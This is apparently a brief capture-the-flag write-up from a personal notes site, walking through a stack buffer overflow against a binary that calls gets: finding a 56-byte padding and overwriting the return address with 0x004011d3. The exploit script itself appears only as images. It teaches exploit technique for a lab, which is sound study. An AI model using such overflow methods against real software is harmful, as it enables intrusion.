![2ee9fdb2ab93cc0791cbf178a78ae2aa.png](a09b188be2af45dba940087e99c92083.png) Let's analyze the binary ![4e3f4f2e13d64a99e7584e9b1e9b78c2.png](61275c2519314493928a8cfd8dfeb88d.png) ![e83827fc3f607bcfeea26470b9cc2154.png](268ffe5d56104b228a4a4ae9a1cf0828.png) We can see that it's calling gets and we can see where we want to end up. Looks like we want to overflow and set the instruction pointer to that address. Let's do it. First, let's see if we can find how many junk characters we need to send for padding Using python and dmesg, we can send different lengths and check where exactly the segfault is occuring ![50a47b5c51540125ef93672f75906952.png](76f9abfc216c4069b75431bbd4e679ce.png) ![1fce1de1a11e5c70ef8dc6b9fc8ca3b6.png](0d2aff858bc8487d83458fcd99a4c497.png) So at 57, we can start to see 41 (A) leaking in. Let's use 56 as our padding then. So now we know both the address we want to jump to (0x004011d3) and the padding required (56). Let's write a script using python and pwntools. ![e35c9fe3fb739f339629446a648b49af.png](025abd299b514adcaaccb67ab21e3a80.png) ![0b660c93498548dc0103907a2da6be2b.png](1a8780429e1e4efabec96c0aa75424ec.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]] Tags: #ctf #buffer_overflow #exploit_development #scripting Related: